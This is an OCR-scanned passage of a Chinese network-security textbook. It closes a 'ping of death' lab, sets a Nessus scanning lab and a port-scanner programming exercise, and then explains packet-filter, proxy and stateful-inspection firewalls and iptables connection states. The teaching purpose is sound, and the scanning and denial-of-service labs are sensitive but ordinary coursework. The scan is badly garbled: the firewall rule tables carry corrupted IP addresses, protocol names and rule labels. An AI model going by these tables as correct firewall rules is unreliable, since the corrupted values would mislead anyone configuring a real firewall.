有 一 个 大 的 增长 ,一 段 时 间 之 后 ,变化 不 再 明显 。 而 资源 监视 器 曲线 在 实验 过 程 中 变化 
不 大 。 

参与 测试 的 主机 也 作 同 样 的 观察 ,看 有 没有 出 现 被 ping 机 的 类 似 情 况 。 
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(a) Wireshark 监 控 到 的 ping 包 数据 流 


100 千 字 节 / 秒 ] 网 洛 100 Kbps 
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(b) 资源 监视 器 


图 2-15 “死亡 之 ping” 实 验 监 视图 
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实验 讨论 : 

请 根据 实验 前 后 的 对 比 数据 ,讨论 “死亡 之 ping” 在 实验 过 程 中 的 现象 。 

16. Nessus 实验 。 

实验 目的 : 通过 Nessus 扫描 工具 的 使 用 ,了 解 漏洞 扫描 的 常用 方法 。 

实验 要 求 : 

(1) 实验 可 以 在 Linux 环境 也 可 以 在 Windows 环境 下 进行 。 

(2) 总 结 Nessus 使 用 过 程 中 遇 到 的 问题 和 解决 办 法 。 

(3) 分 析 Nessus 扫描 结果 ,撰写 分 析 报 告 。 

实验 内 容 : 

(1) 安装 Nessus 的 服务 器 端 ,插件 库 。 

(2) 配置 Nessus 服务 器 端 ,分 配 具 体 用 户 。 

(3) 用 Nessus 客户 端 对 局 域 网 或 者 公共 网 主机 进行 扫描 。 

(4) 分 析 扫 描 结果 报告 ,获取 系统 的 有 用 信息 ,发 现 网 络 系统 的 安全 漏洞 。 

(5) 提出 防范 所 发 现 的 安全 漏洞 的 具体 措施 ,并 付 诸 实施 。 再 用 Nessus 进行 扫描 , 比 
较 两 次 扫描 结果 的 异同 。 

17. 利用 多 线程 编写 一 个 端口 扫描 程序 ,要 求 能 够 扫描 指定 IP 地 址 主机 开放 的 端口 ， 
能 扫描 指定 IP 地 址 段 范围 内 哪些 主机 开放 了 哪些 特定 端口 。 

(1) 写 出 设计 思路 , 画 出 流程 图 。 

(2) 提供 程序 清单 。 

(3) 贴 出 程序 测试 截图 。 
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第 3 章 防火墙 技术 


防火 墙 是 防御 攻击 的 重要 屏障 ,本 章 介绍 包 过 滤 型 .状态 检测 型 .应 用 代理 型 防火 墙 的 
技术 原理 与 应 用 ,涉及 Linux 的 防火 墙 工具 iptable、Windows 的 自 带 防火 墙 。 


3.1 防火 墙 的 概念 


防火 墙 是 一 个 位 于 不 同 网 络 或 者 网 络 安全 域 ( 如 内 部 网 络 和 外 部 网 络 ,专用 网 络 和 公共 
网 络 ) 之 间 的 软件 或 硬件 ,用 来 在 不 同 网 络 之 间 构 造 屏障 ,阻止 对 信息 资源 的 非法 访问 。 防 
火 墙 通过 隔离 控制 机 制 , 对 所 有 流 经 的 网 络 通信 进行 检查 ,可 以 防止 大 部 分 的 攻击 ,避免 其 
非法 操作 在 目标 计算 机 上 被 执行 。 同 时 ,防火 墙 还 可 以 关闭 指定 端口 ,禁止 特定 协议 的 通 
信 , 从 而 阻 断 部 分 木马 的 网 络 连接 。 


3.2 防火 墙 分 类 


防火 墙 技术 的 发 展 经 历 了 包 过 滤 、 应 用 代理 网 关 、 状 态 检 测 3 个 阶段 ,因而 可 以 将 防火 
墙 分 为 包 过 滤 型 防火 墙 \ 应 用 代理 型 防火 墙 和 状态 (检测 ) 防 火 墙 。 包 过 滤 型 防火 墙 以 以 色 
列 的 Checkpoint 防火 墙 和 美国 Cisco 公司 的 PIX 防火 墙 为 代表 ,应 用 代理 型 防火 墙 以 美国 
NAI 公司 的 Gauntlet 防火 墙 为 代表 。 

防火 墙 在 网 络 中 的 位 置 一 般 如 图 3-1 所 示 。 


内 部 网 络 


外 部 网 络 


防火 墙 
图 3-1 防火 墙 部 署 


1. 包 过 滤 型 防火 墙 

包 过 滤 型 防火 墙 工作 在 OSI 参考 模型 的 网 络 层 以 及 传输 层 , 它 能 识别 和 控制 数据 包 的 
源 IP 地 址 和 目的 IP 地 址 ,但 是 在 传输 层 ,只 能 实现 判断 数据 包 是 TCP 数据 包 还 是 UDP 数 
据 包 及 该 数据 包 所 使 用 的 端口 相关 信息 ,以 决定 这 些 包 是 否 允 许 通过 防火 墙 。 防 火 墙 没 有 
任何 关于 活动 连接 的 信息 ,所 以 每 次 收 到 包 都 是 独立 决定 是 否 允 许 通过 。 

由 于 包 过 滤 型 防火 墙 具 分 析 IP 地 址 \、 使 用 的 TCP/UDP 协议 以 及 所 用 端口 ,因此 这 类 
防火 墙 具 有 相对 较 快 的 处 理 速 度 , 并 且 容 易 配 置 。 

包 过 滤 防 火 墙 是 防火 墙 技术 中 最 基础 的 技术 。 包 过 滤 防 火 墙 的 不 足 主要 有 : 不 能 有 
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效 防范 黑客 的 攻击 ; @ 无 法 分 析 应 用 层 协议 ; @ 无 法 处 理 出 现 的 新 的 安全 威胁 。 缓冲 区 溢 
出 型 木马 和 高 端口 监听 木马 能 够 轻易 突破 这 种 防火 墙 的 限制 。 

2. 应 用 代理 型 

应 用 代理 型 防火 墙 工 作 在 应 用 层 ,其 实质 是 一 个 运行 代理 服务 的 网 关 。 它 能 够 彻底 阻 
断 内 部 网 络 和 外 部 网 络 的 直接 通信 ,内 部 网 络 用 户 对 外 部 网 络 的 访问 转变 成 为 防火 墙 访问 
外 部 网 络 ,再 由 防火 墙 转发 给 内 部 网 络 用 户 。 所 有 的 通信 都 必须 经 过 应 用 层 代理 软件 的 转 
发 ,任何 时 候 访 问 者 都 不 能 与 服务 器 直接 建立 TCP 连接 ,并 且 应 用 层 的 协议 会 话 过 程 必须 
符合 代理 的 安全 策略 的 要 求 。 

应 用 代理 防火 墙 最 大 的 优点 是 可 以 检查 应 用 层 、 传 输 层 和 网 络 层 的 协议 特征 ,对 数据 包 
的 检测 能 力 比较 强 ,通常 包含 高 级 应 用 检测 能 力 , 允 许 防火 墙 检 测 尖端 的 应 用 层 攻 击 ,比如 
缓冲 区 溢出 攻击 和 SQL 注入 攻击 。 所 以 它 的 安全 性 相对 更 高 。 其 缺点 主要 表现 在 : 四 应 
用 代理 型 防火 墙 难 于 配置 ; @ 处 理 速 度 非常 慢 。 

3. 状态 检测 型 

包 过 滤 防 火 墙 和 应 用 代理 型 防火 墙 的 实现 是 通过 对 数据 包 的 IP 地 址 、 端 口 等 参数 进行 
检查 来 实现 的 ,而 忽略 了 数据 包 在 传输 过 程 中 的 连接 状态 的 变化 。 网 络 通 信 都 必须 遵循 
TCP/IP 协议 ,根据 TCP 协议 ,每 个 可 靠 连接 的 建立 需要 经 过 3 次 握手 。 这 说 明 在 数据 包 
的 传输 过 程 中 ,前 后 过 程 的 状态 变化 有 着 非常 密切 的 联系 ,状态 检测 技术 就 是 针对 数据 包 传 
输 中 的 状态 变化 而 提出 的 。 在 实现 中 把 进出 网 络 的 数据 当 作 是 一 个 个 会 话 , 为 每 一 个 会 话 
建立 会 话 状态 表 , 在 状态 表 中 记录 会 话 的 状态 变化 。 这 类 防火 墙 不 仅 根据 规则 对 数据 包 完 
成 检查 ,而 且 还 要 考虑 被 检查 数据 包 是 否 符合 其 对 应 会 话 所 处 的 状态 。 当 有 一 个 新 的 包 到 
达 防 火 墙 时 ,过 滤 机 制 首先 检查 这 个 包 是 否 是 当前 活动 连接 (前 面 已 经 授权 过 的 ) 的 一 部 分 。 
只 有 当 这 个 包 没有 出 现在 当前 的 活动 连接 列表 里 时 ,防火 墙 才 会 以 它 的 规则 库 评 估 这 个 包 。 
由 此 可 见 ,在 传输 层 上 状态 检测 防火 墙 能 提供 较为 有 效 的 控制 能 力 。 

状态 检测 防火 墙 的 优点 是 效率 与 性 价 比较 高 ,广泛 适用 于 保护 网 络 的 边界 。 


3.3 ”防火墙 技术 


3.3.1 包 过 滤 技 术 


包 过 滤 的 原理 是 使 用 者 建立 安全 模式 和 规则 ,过 滤 掉 从 防火 墙 经 过 的 被 认为 是 不 安全 
的 数据 包 。 对 数据 包 的 安全 选择 的 依据 是 系统 内 部 事先 设置 的 过 滤 规 则 (又 称 安全 规则 
库 ) 。 一 个 包 过 滤 防 火 墙 通常 是 通过 对 数据 包 的 IP 头 和 TCP 头 或 UDP 头 的 检查 来 实现 
的 ,主要 信息 如 下 : 

(1) 源 IP 地 址 和 目的 IP 地址。 通过 对 IP 地 址 的 过 滤 ,可 以 阻止 到 特定 网 络 ( 或 主机 ) 
的 不 安全 连接 。 

(2) 源 TCP/UDP 端口 和 目的 TCP/UDP 端口 。 通 过 对 端口 的 过 滤 , 可 以 阻止 对 特定 
应 用 程序 的 连接 。 

(3) ICMP 消息 类 型 。 

(4) TCP 包头 中 的 ACK 位 。 
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(5) TCP 链 路 状态 。 

TCP 链 路 状态 是 指 地 址 、 端 口 等 因素 的 组 合 。 为 了 实现 其 可 靠 性 ,每 个 TCP 连接 都 要 
先 经 过 一 个 “握手 "过 程 来 交换 连接 参数 (参见 1. 2. 1 节 )。 每 个 发 送出 去 的 包 在 后 续 的 其 他 
包 被 发 送出 去 之 前 必须 获得 一 个 确认 响应 。 但 并 不 是 对 每 个 TCP 包 都 必须 采用 专门 的 
ACK 包 来 响应 ,实际 上 仅仅 在 TCP 包头 上 设置 一 个 专门 的 位 就 可 以 完成 这 个 功能 。 因 而 
只 要 产生 了 响应 包 就 要 设置 ACK 位 。 连 接 会 话 的 第 一 个 包 不 用 于 确认 , 它 也 就 没有 设置 
ACK 位 ,后 续 会 话 交换 的 TCP 包 就 要 设置 ACK 位 。 

数据 包 过 滤 是 在 网 络 中 适当 的 位 置 对 数据 包 实施 有 选择 的 通过 。 为 系统 内 设置 的 过 滤 
规则 通常 称 为 访问 控制 表 (Access Control List, ACL) ,只 有 满足 过 滤 规 则 的 数据 包 才 被 转 
发 至 相应 的 网 络 接口 ,否则 将 被 丢弃 。 

包 过 滤 在 本 地 端 接收 数据 包 时 ,一 般 不 保留 上 下 文 ,只 根据 目前 数据 包 的 内 容 来 决定 。 
根据 不 同 的 防火 墙 类 型 , 包 过 滤 可 能 在 进入 ,输出 时 或 这 两 个 时 刻 都 进行 。 可 以 拟定 一 个 要 
接受 的 设备 和 服务 的 清单 以 及 一 个 不 接受 的 设备 和 服务 的 清单 ,组 成 访问 控制 表 。 在 主机 
或 网 络 级 容易 用 包 过 滤 接 受 或 拒绝 访问 。 例 如 ,可 以 允许 主机 A 和 主机 BB 之 间 的 任何 IP 
访问 ,或 者 拒绝 除 A 外 的 任何 设备 对 B 的 访问 。 

包 过 滤 实际 上 通过 建立 一 个 可 靠 的 .简单 的 规则 集 来 创建 一 个 被 防火 墙 所 隔离 的 更 安 
全 的 网 络 环境 。 创 建 时 尽量 保持 规则 集 简洁 和 简短 ,因为 规则 越 多 ,就 越 可 能 犯错 误 ;规则 
越 少 ,理解 和 维护 就 越 容易 。 规 则 少 意味 着 只 分 析 少 数 的 规则 ,防火 墙 的 CPU 周期 就 短 ， 
其 效率 就 可 以 提高 。 当 要 从 很 多 规则 入手 时 ,就 要 认真 检查 一 下 整个 安全 体系 结构 ,而 不 仅 
仅 是 防火 墙 。 每 个 防火 墙 规则 都 有 一 个 默认 的 策略 和 一 组 对 特定 消息 类 型 响应 的 动作 集 ， 
每 个 包 依次 在 表 中 对 每 条 规则 进行 检查 ,直到 找到 匹配 规则 的 包 。 

防火 墙 有 两 种 基本 的 策略 : 没有 被 列 为 允许 访问 的 服务 都 是 被 禁止 的 ;没有 被 列 为 禁 
止 访问 的 服务 都 是 被 允许 的 。 包 过 滤 的 设置 必须 遵循 如 下 规则 ， 

(1) 必须 明确 什么 是 应 该 允许 的 和 不 应 该 允许 的 , 即 必须 制定 一 个 安全 策略 。 

(2) 必须 正式 规定 允许 的 包 类 型 \ 包 字段 的 逻辑 表达 。 

(3) 必须 用 防火 墙 支持 的 语法 重 写 表 达 式 。 

为 了 说 明 这 个 问题 ,以 一 个 简单 的 按 源 地 址 数据 包 过 滤 方 式 为 例 。 假 设 网 络 202. 101. 
x.0 是 一 个 危险 的 网 络 ,可 以 用 源 地 址 过 滤 禁 止 内 部 主机 和 该 网 络 进行 通信 。 当 数据 包 经 
过 防火 墙 时 ,防火 墙 检查 数据 包 . 根 据 规则 决定 是 否 允 许 该 包 通 过 。 就 源 地 址 过 滤 而 言 , 防 
火 墙 只 要 检查 目标 地 址 和 源 地 址 就 可 以 了 。 表 3-1 表示 的 是 根据 上 面 的 政策 所 制定 的 
规则 。 


表 3-1 源 地 址 数据 包 过 滤 规 则 


规则 方向 源 地 址 目标 地 址 动作 
A 出 内 部 网 络 202. 101. x. 0 拒绝 
B 并 202. 10Lw0 内 部 网 络 拒绝 


源 地 址 数据 包 过 滤 方 式 没有 利用 数据 包 的 全 部 信息 ,难以 满足 防火 墙 的 需求 。 一 种 更 
好 的 过 滤 方 式 是 “ 按 服务 过 滤 ”。 
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假设 安全 策略 是 禁止 外 部 主机 访问 内 部 的 E-mail 服务 器 (属于 SMTP 协议 ,端口 号 
25) ,允许 内 部 主机 访问 外 部 主机 ,实现 这 种 过 滤 的 访问 控制 规则 类 似 表 3-2。 


表 3-2 按 服务 过 滤 规 则 表 


规则 方向 动作 源 地 址 源 端口 目标 地 址 | 目的 端口 注释 
A 进 拒绝 m x E-mail 25 不 信任 
B 出 允许 * * * x 允许 连接 
C 双向 拒绝 x 关 关 关 默认 状态 


规则 按 从 前 到 后 的 顺序 匹配 ,字段 中 * * ”代表 任意 值 ,没有 被 过 滤 规 则 明确 允许 的 包 将 
被 拒绝 。 也 就 是 说 ,每 一 个 规则 集 都 跟随 一 条 隐 含 的 规则 ,如 表 3-2 中 的 规则 C 就 是 这 样 。 
这 与 一 般 原 则 是 一 致 的 , 即 没 有 明确 允许 就 被 禁止 。 

任何 一 种 协议 都 是 建立 在 双方 的 基础 上 的 ,信息 流 也 是 双向 的 ,所 以 在 考虑 允许 内 部 用 
户 访问 Internet 时 ,必须 允许 数据 包 不 但 可 以 出 站 而 且 可 以 人 站 。 同 理 , 若 禁止 一 种 服务 ， 
也 必须 从 出 站 和 入 站 两 方面 制定 规则 ,规则 总 是 成 对 出 现 的 。 

当 防 火 墙 进行 包 过 滤 时 ,首先 ,假设 处 于 一 个 C 类 网 116. 101. y. 0, 认 为 站 点 202. 101. x. 3 
上 有 不 健康 的 BBS ,希望 阻止 网 络 中 的 用 户 访问 该 站 点 的 BBS。 再 假设 这 个 站 点 的 BBS 服务 
是 通过 Telnet 方式 提供 的 ,因而 需要 阻止 往 该 站 点 的 出 站 Telnet 服务 。 允 许 内 部 网 用 户 通 过 
Telnet 方式 访问 Internet 的 其 他 站 点 ,但 不 允许 其 他 站 点 以 Telnet 方式 访问 网 络 。 其 次 ,为 了 
收发 电子 邮件 ,允许 SMTP 出 /入 站 服务 ,邮件 服务 器 的 IP 地 址 为 116. 101. y. 1。 最 后 ,对 于 
WWW 服务 ,允许 内 部 网 用 户 访 问 Internet 上 的 任何 网 络 和 站 点 ,但 只 允许 一 个 公司 的 网 络 访 
问 内 部 WWW 服务 器 ,内 部 WWW 服务 器 的 IP 地 址 为 116. 101. y. 5 ,该 公司 的 网 络 为 98. 120. 
z.0。 根据 上 面 的 策略 安排 ,可 以 得 到 一 个 规则 集 ,如 表 3-3 所 示 。 


表 3-3 ”过滤 规则 示例 


规则 方向 源 地 址 目标 地 址 协议 源 端 口 | 目标 端口 | ACK 设置 | 动作 
A 出 116. 101.y.0 | 202.101.x6 | TCP 二 1023 23 任意 拒绝 
B 入 202. 108. x.6 | 116.101.y.0 TCP 23 二 1023 是 任意 
出 116.101.y.0 | 任意 TCP >1023 23 任意 允许 
D 任意 116. 101.y.0 TEP 23 >>1023 是 允许 
E 出 116. 101.y.1 | 任意 TCP >>1023 25 任意 允许 
F 入 任意 ii6, lol.w Lb’ | TCP 25 >1023 是 允许 
G 入 任意 116.101.y.1 | TCP >1023 25 任意 允许 
H 出 116. 101.y.1 任意 TCP 25 >>1023 任意 允许 
I 出 116. 101.y.0 | 任意 人 二 1023 80 任意 允许 
J 入 任意 116. 101.y.0 | TCP 80 >1023 是 允许 
K 入 98. 120.z.0 116.101.y.5 | TCP 二 1023 80 任意 允许 
下 出 116. 101.y.5 | 98.120.z.0 TCP | 80 >1023 任意 允许 
M 双向 | 任意 任意 任意 任意 任意 


规则 A、B 用 来 阻止 内 部 主机 以 Telnet 服务 形式 连接 到 站 点 202. 101. x. 6 ,规则 C、D 
允许 内 部 主机 以 Telnet 方式 访问 Internet 上 的 任何 主机 。 在 设置 规则 时 ,规则 的 次 序 非常 
关键 。 防 火 墙 实施 规则 的 特点 是 , 当 防 火 墙 找 到 匹配 的 规则 后 就 不 再 向 下 应 用 其 他 的 规则 ， 
所 以 当 内 部 网 主机 访问 站 点 202. 101. x. 6, 并 试图 通过 Telnet 建立 连接 时 ,这 个 连接 请 求 会 
被 规则 A 阻塞 ,因为 规则 A 正好 与 之 相 匹 配 。 至 于 规则 B, 用 来 限制 站 点 202. 101. x.6 的 
Telnet 服务 的 返回 包 。 事 实 上 ,内 部 主机 试图 建立 Telnet 连接 时 就 会 被 阻塞 ,一 般 不 会 存 
在 返回 包 。 但 用 户 如 果 通 过 其 他 办 法 使 连接 成 功 , 则 B 规则 将 起 作用 。 当 用 户 以 Telnet 方 
式 访问 除 202. 108. x. 6 之 外 的 其 他 站 点 时 ,规则 A、B 不 匹配 ,所 以 应 用 C.D 规则 ,内 部 主 
机 被 允许 建立 连接 ,返回 包 也 被 允许 人 站 。 

规则 EF 用 于 允许 出 站 的 SMTP 服务 ,规则 G、H 用 于 允许 人 站 的 SMTP 服务 。 表 中 
目标 端口 一 栏 中 25 是 SMTP 的 服务 端口 。 

I 和 J 规则 用 于 允许 出 站 的 WWW 服务 ,K、L 规则 用 于 允许 网 络 98. 120. z.0 的 主机 访 
问 本 网 络 WWW 服务 器 。 

规则 M 是 默认 项 , 它 实 现 的 准则 是 "没有 明确 允许 就 表示 禁止 ”。 

防火 墙 对 网 络 通 信 的 访问 控制 一 般 都 是 通过 访问 控制 表 来 实现 的 ,其 形式 是 类 似 如 下 
的 一 些 规则 : 

(1) accept from 源 IP 地 址 , 源 端口 to 目标 IP 地 址 ,目标 端口 (动作 ) 。 

(2) deny from 源 IP 地 址 , 源 端口 to 目标 IP 地 址 ,目标 端口 (动作 )。 

(3) nat from 源 IP 地 址 , 源 端 口 to 目标 IP 地 址 ,目标 端口 (动作 ) 。 

规则 (1) 表 示 防 火 墙 允许 * 源 IP 地 址 ”和 * 源 端口 ?到 “目标 IP 地 址 ”和 “目标 端口 ”的 网 
络 通信 ;规则 (2) 则 相反 ,拒绝 “ 源 IP 地 址 ”和 “ 源 端口 ”到 “目标 IP 地址 ”和 “目标 端口 "的 网 
络 通信 ;规则 (3) 表 示人 允许 地 址 转换 。 防 火 墙 在 网 络 层 (包括 以 下 的 链 路 层 ) 接 收 到 网 络 数据 
包 后 ,就 与 以 上 的 规则 表 进 行 逐 条 匹配 ,如果 符 合 就 执行 相应 “动作 ”( 例 如 丢弃 数据 包 ) 。 


3.3.2 状态 检测 技术 


状态 检测 防火 墙 采用 了 状态 检测 包 过 滤 技 术 , 是 传统 包 过 滤 上 的 功能 扩展 。 传 统 的 包 
过 滤 防 火 墙 只 是 通过 检测 IP 包头 的 相关 信息 来 决定 数据 流 是 通过 还 是 拒绝 ,而 状态 检测 技 
术 采 用 的 是 一 种 基于 连接 的 状态 检测 机 制 , 将 属于 同一 连接 的 所 有 包 作 为 一 个 整体 的 数据 
流 看 待 ,构成 连接 状态 表 , 通 过 规则 表 与 连接 状态 表 的 共同 配合 ,对 表 中 的 各 个 连接 状态 因 
素 加 以 识别 。 这 里 动态 连接 状态 表 中 的 记录 可 以 是 以 前 的 通信 信息 ,也 可 以 是 其 他 相关 应 
用 程序 的 信息 ,因此 ,与 传统 包 过 滤 防 火 墙 的 静态 过 滤 规 则 表 相 比 , 它 具有 更 好 的 灵活 性 和 
安全 性 。 

状态 检测 防火 墙 读 取 、 分 析 和 利用 了 全 面 的 网 络 通信 信息 和 状态 。 

(1) 通信 信息 , 即 7 层 协议 的 当前 信息 。 防 火 墙 的 检测 模块 位 于 操作 系统 的 内 核 ,在 网 
络 层 之 下 ,能 在 数据 包 到 达 网 关 操 作 系 统 之 前 对 它们 进行 分 析 。 防 火 墙 先 在 低 协 议 层 上 检 
查 数据 包 是 否 满足 安全 策略 ,对 于 满足 的 数据 包 , 再 从 更 高 协议 层 上 进行 分 析 。 它 验证 数据 
的 源 地 址 .目标 地 址 和 端口 号 .协议 类 型 .应 用 信息 等 多 层 的 标志 ,因此 具有 更 全 面 的 安 
全 性 。 

(2) 通信 状态 , 即 以 前 的 通信 信息 。 对 于 简单 的 包 过 滤 防 火 墙 ,如 果 要 允许 FTP 通过 ， 
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就 必须 作出 让 步 而 打开 许多 端口 ,这 样 就 降低 了 安全 性 。 状 态 检测 防火 墙 在 连接 状态 表 中 
保存 以 前 的 通信 信息 ,记录 从 受 保护 网 络 发 出 的 数据 包 的 状态 信息 ,例如 FTP 请 求 的 服务 
器 地 址 和 端口 客户 端 地 址 和 为 满足 此 次 FTP 临时 打开 的 端口 ,然后 ,防火 墙根 据 该 表 内 容 
对 返回 受 保护 网 络 的 数据 包 进行 分 析 判断 ,这 样 ,只 有 响应 受 保 护 网 络 请 求 的 数据 包 才 被 放 
行 。 对 于 UDP 或 者 RPC 等 无 连接 的 协议 ,检测 模块 可 创建 虚 会 话 信 息 用 来 进行 跟踪 。 

(3) 应 用 状态 , 即 其 他 相关 应 用 的 信息 。 状 态 检测 模块 能 够 理解 并 学 习 各 种 协议 和 应 
用 ,以 支持 各 种 最 新 的 应 用 。 它 比 代理 服务 器 支持 的 协议 和 应 用 要 多 得 多 ,并且 它 能 从 应 用 
程序 中 收集 状态 信息 存 人 连接 状态 表 中 ,以 供 其 他 应 用 或 协议 作为 检测 策略 。 例 如 ,已 经 通 
过 防火 墙 认证 的 用 户 可 以 通过 防火 墙 访问 其 他 授权 的 服务 。 

(4) 操作 信息 , 即 在 数据 包 中 能 执行 逻辑 或 数学 运算 的 信息 。 状 态 监 测 技术 采用 强大 
的 面向 对 象 的 方法 ,基于 通信 信息 、 通 信 状 态 、 应 用 状态 等 多 方面 因素 ,利用 灵活 的 表达 式 形 
式 , 结 合 安全 规则 、 应 用 识别 知识 状态 关联 信息 以 及 通信 数据 ,构造 更 复杂 的 、 更 灵活 的 、 满 
足 用 户 特定 安全 要 求 的 策略 规则 。 

状态 检测 防火 墙 通过 对 控制 通信 的 基本 因素 状态 信息 (状态 信息 包括 通信 信息 、 通 信 状 
态 、 应 用 状态 和 信息 操作 性 ) 进 行 检测 。 通 过 状态 检测 虚拟 机 维护 一 个 动态 的 连接 状态 表 ， 
记录 所 有 的 连接 通信 信息 和 通信 状态 ,完成 对 数据 包 的 检测 和 过 滤 。 最 大 限度 地 保证 了 网 
络 的 安全 。 
当 用 户 访问 请 求 到 达 防 火 墙 时 ,状态 检测 器 要 抽取 有 关 的 数据 进行 分 析 ,结合 网 络 配置 
和 安全 规则 完成 接纳 、 拒 绝 、. 身 份 认证 .报警 或 加 密 等 处 理 动作 。 防 火 墙根 据 IP 包头 的 信息 
与 安全 策略 来 决定 是 否 转发 卫 包 。 通 常 的 包 过 滤 机 制 在 接 到 每 一 个 IP 包 时 , 包 是 被 单独 
匹配 和 检查 的 ,系统 认为 IP 包 之 间 是 没有 关联 的 ,是 独立 地 进行 路 由 和 转发 的 ,独立 地 在 过 
滤 规 则 集中 寻找 相对 应 的 过 滤 规 则 。 过 滤 规 则 通常 是 顺序 相关 的 ,需要 从 前 到 后 与 每 条 规 
则 进行 匹配 ,效率 比较 低 。 为 了 克服 这 一 缺点 ,改造 包 过 滤 防 火 墙 单独 匹配 和 检查 IP 包 的 
这 一 特性 ,从 系统 中 存储 的 上 层 协 议 ( 主 要 是 TCP、UDP、ICMP 协议 的 连接 状态 中 选 出 属 
于 “同一 层 上 协议 会 话 过 程 的 IP 数据 流 ”, 以 有 关联 的 IP 数据 流 来 过 滤 和 处 理 防 火 墙 系统 
转发 的 IP 数据 包 , 而 不 是 独立 地 检查 IP 数据 包 , 达 到 提高 系统 转发 率 的 目的 ,这 就 是 状态 
检测 的 基本 原理 。 

状态 检测 防火 墙 基本 保持 了 简单 包 过 滤 防 火 墙 的 优点 ,性 能 比较 好 ,同时 对 应 用 是 透明 
的 ,对 于 安全 性 有 了 大 幅 提升 。 这 种 防火 墙 拨 奔 了 简单 包 过 滤 防 火 墙 仅 仅 考察 进出 网 络 的 
数据 包 ,不 关心 数据 包 状 态 的 缺点 ,在 防火 墙 的 核心 部 分 建立 状态 连接 表 , 维 护 了 连接 ,将 进 
出 网 络 的 数据 当成 一 个 个 的 事件 来 处 理 。 状 态 检测 包 过 滤 防 火 墙 规范 了 网 络 层 和 传输 层 行 
为 ,而 应 用 代理 型 防火 墙 则 是 规范 了 特定 的 应 用 协议 上 的 行为 。 

状态 检测 主要 针对 TCP 协议 。 因 为 TCP 协议 是 面向 连接 的 , 它 和 状态 检测 的 基本 思 
想 非 常 吻合 。TCP 协议 是 网 络 中 使 用 最 广泛 的 网 络 层 协议 ,TCP 的 安全 直接 决定 了 网 络 通 
信 的 安全 。SYN FIN、ACK 是 TCP 头 的 标志 位 ,其 中 SYN 指 开始 一 个 连接 ,FIN 指 关 闭 
一 个 连接 ,ACK 指 对 序列 号 的 确认 。 

当 通 过 使 用 一 个 SYN 包 来 建立 一 个 会 话 时 ,防火 墙 先 将 这 个 数据 包 和 规则 库 进 行 比 
较 。 如 果 通 过 了 这 个 数据 连接 请 求 ,就 将 它 添加 到 状态 检测 表 里 。 这 时 需要 设置 一 个 时 间 
溢出 值 ,然后 防火 墙 等 待 一 个 返回 的 确认 连接 的 数据 包 , 当 接收 到 此 包 的 时 候 , 防 火 墙 将 连 
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接 的 时 间 洪 出 值 另 设 为 一 个 合适 值 。 对 返回 的 连接 请 求 的 数据 包 类 型 需要 作出 判断 ,以 确 
认 其 含有 SYN/ACK 标志 。 在 进行 状态 监测 时 ,一 个 会 话 的 确认 可 以 只 通过 使 用 源 地址 、 
目标 地 址 和 端口 号 来 区 分 ,在 性 能 设计 上 如 果 能 满足 要 求 , 也 可 以 考虑 TCP 连接 的 序列 号 
维护 。 

一 个 防火 墙 接收 到 一 个 初始 化 TCP 连接 的 SYN 包 , 这 个 带 有 SYN 的 数据 包 被 防火 墙 
的 规则 库 检查 。 该 包 在 规则 库 里 依次 与 规则 进行 比较 。 如 果 在 检查 所 有 的 规则 后 ,该 包 都 
没有 被 接受 ,那么 拒绝 该 次 连接 ;如 果 该 包 被 接受 ,那么 本 次 会 话 被 记录 到 状态 监测 表 里 。 
随后 的 数据 包 ( 没 有 带 SYN 标志 ) 就 和 该 状态 监测 表 的 内 容 进行 比较 。 如 果 会 话 是 在 状态 
表 内 ,而 且 该 数据 包 是 会 话 的 一 部 分 ,该 数据 包 就 被 接受 ;如 果 不 是 会 话 的 一 部 分 ,该 数据 包 
将 被 丢弃 。 这 种 方式 提高 了 系统 的 性 能 ,因为 每 一 个 数据 包 不 是 和 规则 库 比 较 , 而 是 和 状态 
监测 表 比 较 。 只 有 在 SYN 的 数据 包 到 来 时 才 和 规则 库 比较 , 且 所 有 的 数据 包 与 状态 检测 
表 的 比较 都 在 内 核 模式 下 进行 。 


3.3.2.1 iptables 状态 检测 机 制 

Linux 内 核 中 的 防火 墙 开发 工具 iptables 功能 非常 丰富 ,是 Linux 系统 构建 防火 墙 的 
首选 。iptables 提供 了 INPUT、FORWARD、OUTPUT 3 条 链 ,通过 iptables 在 这 3 条 链 中 
开发 自己 的 防护 规则 , 比 简单 的 包 过 滤 具 备 了 更 多 方面 的 防护 。iptables 只 是 一 个 管理 内 
核 包 过 滤 的 工具 ,可 以 加 入 、 插 入 或 删除 核心 包 过 滤 表 格 中 的 规则 。iptables 中 的 状态 检测 
功能 是 由 state 选项 来 实现 的 。state 模块 能 够 跟踪 分 组 的 连接 状态 ( 即 状态 检测 ) 。 

state 是 一 个 用 逗号 分 隔 的 列表 ,表示 要 匹配 的 连接 状态 。 有 效 的 状态 选项 有 以 下 
4 个 : INVALID, 表 示 分 组 对 应 的 连接 是 未 知 的 ; ESTABLISHED, 表 示 分 组 对 应 的 连接 已 
经 进行 了 双向 的 分 组 传输 ,也 就 是 说 连接 已 经 建立 ;NEW ,表示 这 个 分 组 需要 发 起 一 个 连 
接 , 或 者 说 ,分 组 对 应 的 连接 在 两 个 方向 上 都 没有 进行 过 分 组 传输 ;RELATED, 表 示 分 组 要 
发 起 一 个 新 的 连接 ,但 是 这 个 连接 和 一 个 现 有 的 连接 有 关 。 例 如 ,FTP 的 数据 传输 连接 和 
控制 连接 之 间 就 是 RELATED 关系 。 

连接 状态 表 能 够 保存 的 最 大 连接 数 取 决 于 硬件 的 物理 内 存 。 

在 iptables 实现 的 结构 中 主要 通过 数据 包 过 滤 (Filter 表 ) 、 网 络 地 址 转换 (Nat 表 ) 及 数 
据 包 处 理 (Mangle 表 ) 来 实现 数据 包 的 过 滤 和 状态 检测 ,如 图 3-2 所 示 。 

(1) filter 表 不 会 对 数据 包 进 行 修改 ,而 是 对 数据 包 进 行 过 滤 。 

(2) nat 表 监 听 3 个 Natfilter 钧 子 函数 ;nat 表 不 同 于 filter 表 , 只 有 新 连接 的 第 一 个 数 
据 包 将 遍历 表 , 而 随后 的 数据 包 将 根据 第 一 个 数据 包 的 结果 进行 同样 的 转换 处 理 。 

(3) mangle 表 在 NF-IP-PRE-ROUTING 和 NF-IV-LOCAL-OUT 钧 子 中 进行 注册 。 
使 用 mangle 表 , 可 以 实现 对 数据 包 的 修改 或 给 数据 包 附 上 一 些 带 外 数据 。 
(4) 连接 跟踪 是 NAT 的 基础 ,已 经 作为 一 个 单独 的 模块 被 实现 。 该 功能 用 于 包 过 滤 功 
能 的 一 个 扩展 ,使 用 连接 跟踪 来 实现 “基于 状态 ”的 防火 墙 。 

